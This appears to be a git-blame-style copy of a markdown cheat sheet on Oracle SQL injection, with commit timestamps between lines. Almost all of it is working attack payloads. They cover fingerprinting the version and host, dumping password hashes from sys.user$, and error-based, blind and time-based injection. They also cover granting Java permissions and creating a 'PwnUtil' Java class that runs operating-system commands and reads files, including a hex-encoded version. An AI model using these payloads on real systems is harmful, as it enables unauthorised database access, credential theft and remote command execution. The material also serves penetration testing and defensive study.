2018-04-27 21:31:58 +00:00
# Oracle SQL Injection
2019-10-29 13:27:33 +00:00
## Summary
2023-04-14 15:45:45 +00:00
* [Oracle SQL Default Databases ](#oracle-sql-default-databases )
* [Oracle SQL Comments ](#oracle-sql-comments )
* [Oracle SQL Version ](#oracle-sql-version )
* [Oracle SQL Hostname ](#oracle-sql-hostname )
* [Oracle SQL Database Name ](#oracle-sql-database-name )
* [Oracle SQL Database Credentials ](#oracle-sql-database-credentials )
2019-10-29 13:27:33 +00:00
* [Oracle SQL List databases ](#oracle-sql-list-databases )
* [Oracle SQL List columns ](#oracle-sql-list-columns )
* [Oracle SQL List tables ](#oracle-sql-list-tables )
* [Oracle SQL Error Based ](#oracle-sql-error-based )
* [Oracle SQL Blind ](#oracle-sql-blind )
* [Oracle SQL Time Based ](#oracle-sql-time-based )
* [Oracle SQL Command execution ](#oracle-sql-command-execution )
* [References ](#references )
2023-04-14 15:45:45 +00:00
## Oracle SQL Default Databases
| Name | Description |
|--------------------|---------------------------|
| SYSTEM | Available in all versions |
| SYSAUX | Available in all versions |
## Oracle SQL Comments
| Type | Description |
|----------------------------|-----------------------------------|
| `-- -` | SQL comment |
## Oracle SQL Version
2018-08-12 21:30:22 +00:00
2018-05-16 21:33:14 +00:00
```sql
2018-04-27 21:31:58 +00:00
SELECT user FROM dual UNION SELECT * FROM v$version
2023-04-14 15:45:45 +00:00
SELECT banner FROM v$version WHERE banner LIKE 'Oracle%';
SELECT banner FROM v$version WHERE banner LIKE 'TNS%';
SELECT version FROM v$instance;
2018-04-27 21:31:58 +00:00
```
2023-12-10 12:27:21 +00:00
2023-04-14 15:45:45 +00:00
## Oracle SQL Hostname
```sql
SELECT host_name FROM v$instance; (Privileged)
SELECT UTL_INADDR.get_host_name FROM dual;
SELECT UTL_INADDR.get_host_name('10.0.0.1') FROM dual;
SELECT UTL_INADDR.get_host_address FROM dual;
```
## Oracle SQL Database Name
2018-08-12 21:30:22 +00:00
2018-05-16 21:33:14 +00:00
```sql
2018-04-27 21:31:58 +00:00
SELECT global_name FROM global_name;
SELECT name FROM V$DATABASE;
SELECT instance_name FROM V$INSTANCE;
SELECT SYS.DATABASE_NAME FROM DUAL;
```
2023-12-10 12:27:21 +00:00
2023-04-14 15:45:45 +00:00
## Oracle SQL Database Credentials
| Query | Description |
|-----------------------------------------|---------------------------|
| `SELECT username FROM all_users;` | Available on all versions |
| `SELECT name, password from sys.user$;` | Privileged, < = 10g |
| `SELECT name, spare4 from sys.user$;` | Privileged, < = 11g |
2018-04-27 21:31:58 +00:00
## Oracle SQL List Databases
2018-08-12 21:30:22 +00:00
2018-05-16 21:33:14 +00:00
```sql
2018-04-27 21:31:58 +00:00
SELECT DISTINCT owner FROM all_tables;
```
2023-12-10 12:27:21 +00:00
2019-10-29 13:27:33 +00:00
## Oracle SQL List Columns
2018-08-12 21:30:22 +00:00
2018-05-16 21:33:14 +00:00
```sql
2018-04-27 21:31:58 +00:00
SELECT column_name FROM all_tab_columns WHERE table_name = 'blah';
SELECT column_name FROM all_tab_columns WHERE table_name = 'blah' and owner = 'foo';
```
2023-12-10 12:27:21 +00:00
2018-04-27 21:31:58 +00:00
## Oracle SQL List Tables
2018-08-12 21:30:22 +00:00
2018-05-16 21:33:14 +00:00
```sql
2018-04-27 21:31:58 +00:00
SELECT table_name FROM all_tables;
SELECT owner, table_name FROM all_tables;
SELECT owner, table_name FROM all_tab_columns WHERE column_name LIKE '%PASS%';
```
2023-12-10 12:27:21 +00:00
2018-04-27 21:31:58 +00:00
## Oracle SQL Error based
2023-12-10 12:27:21 +00:00
| Description | Query |
| :-------------------- | :------------- |
| Invalid HTTP Request | `SELECT utl_inaddr.get_host_name((select banner from v$version where rownum=1)) FROM dual` |
| CTXSYS.DRITHSX.SN | `SELECT CTXSYS.DRITHSX.SN(user,(select banner from v$version where rownum=1)) FROM dual` |
| Invalid XPath | `SELECT ordsys.ord_dicom.getmappingxpath((select banner from v$version where rownum=1),user,user) FROM dual` |
| Invalid XML | `SELECT to_char(dbms_xmlgen.getxml('select "'||(select user from sys.dual)||'" FROM sys.dual')) FROM dual` |
| Invalid XML | `SELECT rtrim(extract(xmlagg(xmlelement("s", username || ',')),'/s').getstringval(),',') FROM all_users` |
| SQL Error | `SELECT NVL(CAST(LENGTH(USERNAME) AS VARCHAR(4000)),CHR(32)) FROM (SELECT USERNAME,ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=1))` |
| XDBURITYPE getblob | `XDBURITYPE((SELECT banner FROM v$version WHERE banner LIKE 'Oracle%')).getblob()` |
| XDBURITYPE getclob | `XDBURITYPE((SELECT table_name FROM (SELECT ROWNUM r,table_name FROM all_tables ORDER BY table_name) WHERE r=1)).getclob()` |
When the injection point is inside a string use : `'||PAYLOAD--`
2021-10-04 15:52:48 +00:00
2018-04-27 21:31:58 +00:00
## Oracle SQL Blind
2023-12-10 12:27:21 +00:00
| Description | Query |
| :----------------------- | :------------- |
| Version is 12.2 | `SELECT COUNT(*) FROM v$version WHERE banner LIKE 'Oracle%12.2%';` |
| Subselect is enabled | `SELECT 1 FROM dual WHERE 1=(SELECT 1 FROM dual)` |
| Table log_table exists | `SELECT 1 FROM dual WHERE 1=(SELECT 1 from log_table);` |
| Column message exists in table log_table | `SELECT COUNT(*) FROM user_tab_cols WHERE column_name = 'MESSAGE' AND table_name = 'LOG_TABLE';` |
| First letter of first message is t | `SELECT message FROM log_table WHERE rownum=1 AND message LIKE 't%';` |
2018-04-27 21:31:58 +00:00
2023-04-14 15:45:45 +00:00
2018-05-16 21:33:14 +00:00
## Oracle SQL Time based
2018-08-12 21:30:22 +00:00
2018-05-16 21:33:14 +00:00
```sql
2023-04-14 15:45:45 +00:00
AND [RANDNUM]=DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME])
2018-05-16 21:33:14 +00:00
```
2018-04-27 21:31:58 +00:00
2023-04-14 15:45:45 +00:00
2022-09-13 20:04:21 +00:00
## Oracle SQL Command Execution
2018-08-12 21:30:22 +00:00
2022-01-30 22:41:31 +00:00
* [ODAT (Oracle Database Attacking Tool) ](https://github.com/quentinhardy/odat )
2022-09-13 20:04:21 +00:00
### Oracle Java Execution
* List Java privileges
```sql
select * from dba_java_policy
select * from user_java_policy
```
* Grant privileges
```sql
exec dbms_java.grant_permission('SCOTT', 'SYS:java.io.FilePermission','< < ALL FILES > >','execute');
exec dbms_java.grant_permission('SCOTT','SYS:java.lang.RuntimePermission', 'writeFileDescriptor', '');
exec dbms_java.grant_permission('SCOTT','SYS:java.lang.RuntimePermission', 'readFileDescriptor', '');
```
* Execute commands
* 10g R2, 11g R1 and R2: `DBMS_JAVA_TEST.FUNCALL()`
```sql
SELECT DBMS_JAVA_TEST.FUNCALL('oracle/aurora/util/Wrapper','main','c:\\windows\\system32\\cmd.exe','/c', 'dir >c:\test.txt') FROM DUAL
SELECT DBMS_JAVA_TEST.FUNCALL('oracle/aurora/util/Wrapper','main','/bin/bash','-c','/bin/ls>/tmp/OUT2.LST') from dual
```
* 11g R1 and R2: `DBMS_JAVA.RUNJAVA()`
```sql
SELECT DBMS_JAVA.RUNJAVA('oracle/aurora/util/Wrapper /bin/bash -c /bin/ls>/tmp/OUT.LST') FROM DUAL
```
### Oracle Java Class
2018-05-16 21:33:14 +00:00
```sql
2018-04-27 21:31:58 +00:00
/* create Java class */
BEGIN
EXECUTE IMMEDIATE 'create or replace and compile java source named "PwnUtil" as import java.io.*; public class PwnUtil{ public static String runCmd(String args){ try{ BufferedReader myReader = new BufferedReader(new InputStreamReader(Runtime.getRuntime().exec(args).getInputStream()));String stemp, str = "";while ((stemp = myReader.readLine()) != null) str += stemp + "\n";myReader.close();return str;} catch (Exception e){ return e.toString();}} public static String readFile(String filename){ try{ BufferedReader myReader = new BufferedReader(new FileReader(filename));String stemp, str = "";while((stemp = myReader.readLine()) != null) str += stemp + "\n";myReader.close();return str;} catch (Exception e){ return e.toString();}}};';
END;
/
BEGIN
EXECUTE IMMEDIATE 'create or replace function PwnUtilFunc(p_cmd in varchar2) return varchar2 as language java name ''PwnUtil.runCmd(java.lang.String) return String'';';
END;
/
/* run OS command */
SELECT PwnUtilFunc('ping -c 4 localhost') FROM dual;
```
2018-08-12 21:30:22 +00:00
2018-04-27 21:31:58 +00:00
or (hex encoded)
2018-05-16 21:33:14 +00:00
```sql
2018-04-27 21:31:58 +00:00
/* create Java class */
SELECT TO_CHAR(dbms_xmlquery.getxml('declare PRAGMA AUTONOMOUS_TRANSACTION; begin execute immediate utl_raw.cast_to_varchar2(hextoraw(''637265617465206f72207265706c61636520616e6420636f6d70696c65206a61766120736f75726365206e616d6564202270776e7574696c2220617320696d706f7274206a6176612e696f2e2a3b7075626c696320636c6173732070776e7574696c7b7075626c69632073746174696320537472696e672072756e28537472696e672061726773297b7472797b4275666665726564526561646572206d726561643d6e6577204275666665726564526561646572286e657720496e70757453747265616d5265616465722852756e74696d652e67657452756e74696d6528292e657865632861726773292e676574496e70757453747265616d282929293b20537472696e67207374656d702c207374723d22223b207768696c6528287374656d703d6d726561642e726561644c696e6528292920213d6e756c6c29207374722b3d7374656d702b225c6e223b206d726561642e636c6f736528293b2072657475726e207374723b7d636174636828457863657074696f6e2065297b72657475726e20652e746f537472696e6728293b7d7d7d''));
EXECUTE IMMEDIATE utl_raw.cast_to_varchar2(hextoraw(''637265617465206f72207265706c6163652066756e6374696f6e2050776e5574696c46756e6328705f636d6420696e207661726368617232292072657475726e207661726368617232206173206c616e6775616765206a617661206e616d65202770776e7574696c2e72756e286a6176612e6c616e672e537472696e67292072657475726e20537472696e67273b'')); end;')) results FROM dual
/* run OS command */
SELECT PwnUtilFunc('ping -c 4 localhost') FROM dual;
```
2018-12-24 14:02:50 +00:00
## References
2018-08-12 21:30:22 +00:00
2022-06-19 20:48:46 +00:00
* [NetSpi - SQL Wiki ](https://sqlwiki.netspi.com/injectionTypes/errorBased/#oracle )
2023-12-10 12:27:21 +00:00
* [ASDC12 - New and Improved Hacking Oracle From Web - OWASP ](https://owasp.org/www-pdf-archive/ASDC12-New_and_Improved_Hacking_Oracle_From_Web.pdf )
2022-09-13 20:04:21 +00:00
* [Pentesting Oracle TNS Listener - HackTricks ](https://book.hacktricks.xyz/network-services-pentesting/1521-1522-1529-pentesting-oracle-listener )
2023-12-10 12:27:21 +00:00
* [ODAT: Oracle Database Attacking Tool - quentinhardy ](https://github.com/quentinhardy/odat/wiki/privesc )
* [WebSec CheatSheet - Oracle ](https://www.websec.ca/kb/sql_injection#Oracle_Default_Databases )
* [New payload to exploit Error-based SQL injection - Oracle database - Mannu Linux - 12/09/2023 ](https://www.mannulinux.org/2023/12/New-payload-to-exploit-Error-based-SQL-injection-Oracle-database.html )